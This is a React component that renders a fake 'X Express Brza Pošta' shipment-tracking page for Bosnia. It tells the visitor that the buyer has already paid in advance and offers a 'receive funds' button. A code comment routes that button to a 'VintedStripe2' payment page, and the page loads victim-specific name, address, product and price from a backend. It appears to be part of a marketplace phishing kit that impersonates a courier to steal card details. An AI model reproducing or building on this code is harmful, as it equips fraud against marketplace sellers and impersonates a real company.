import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './XExpressBaSuccess.css';
import SupportWidget from './SupportWidget';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const PUB = process.env.PUBLIC_URL || '';

const BANNER_HEADER = `${PUB}/xexpress-ba/banner-header.png`;
const BANNER_ABOVE_FOOTER = `${PUB}/xexpress-ba/banner-above-footer.png`;
const BANNER_FOOTER = `${PUB}/xexpress-ba/banner-footer.png`;

/**
 * X Express Brza Pošta (BA) — nakon kaptcha; dugme → index2 (VintedStripe2).
 * Header, blok iznad footera i footer su statičke slike (banneri).
 */
function XExpressBaSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'BA').toUpperCase();
  const primary = getPrimaryCurrency(countryCode);
  const curSym = getSymbol(primary);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  })();

  const priceText =
    Number.isFinite(priceNumber) && priceNumber % 1 === 0
      ? String(priceNumber.toFixed(0))
      : String(priceNumber);

  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const fullName = [fn, ln].filter(Boolean).join(' ') || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '—';
  const napomenaVal = `${productName}, ${priceText} ${curSym}`;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="xe-root">
        <div className="xe-loading">Učitavanje…</div>
        <div className="xe-support-wrap">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="xe-root">
      <header className="xe-banner xe-banner--header">
        <img
          src={BANNER_HEADER}
          alt="X Express Brza pošta — zaglavlje"
          className="xe-banner-img"
          width={1440}
          height={120}
        />
      </header>

      <main className="xe-main">
        <div className="xe-main-grid">
          <div className="xe-main-left">
            <h1>Praćenje pošiljke</h1>
            <p className="xe-sub">Informacije o proizvodu</p>
            <p className="xe-status">Avansno plaćanje izvršeno od strane primaoca.</p>

            <div className="xe-fields">
              <div className="xe-field">
                <span className="xe-field-label">Naziv firme / Ime i prezime</span>
                <input type="text" className="xe-field-input" readOnly value={fullName} />
              </div>
              <div className="xe-field">
                <span className="xe-field-label">Grad / Adresa</span>
                <input type="text" className="xe-field-input" readOnly value={address} />
              </div>
              <div className="xe-field xe-field--full">
                <span className="xe-field-label">Napomena</span>
                <input type="text" className="xe-field-input" readOnly value={napomenaVal} />
              </div>
            </div>

            <Link to={index2Path} className="xe-cta">
              PRIJEM SREDSTAVA ({priceText} KM)
            </Link>
          </div>
          <div>
            <img
              className="xe-side-img"
              src={`${PUB}/xexpress-ba/gallery-4.png`}
              alt=""
            />
          </div>
        </div>
      </main>

      <div className="xe-banner xe-banner--mid">
        <img
          src={BANNER_ABOVE_FOOTER}
          alt=""
          className="xe-banner-img"
          width={1440}
          height={400}
        />
      </div>

      <footer className="xe-banner xe-banner--footer">
        <img
          src={BANNER_FOOTER}
          alt="X Express — podnožje"
          className="xe-banner-img"
          width={1440}
          height={480}
        />
      </footer>

      <div className="xe-support-wrap">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default XExpressBaSuccess;
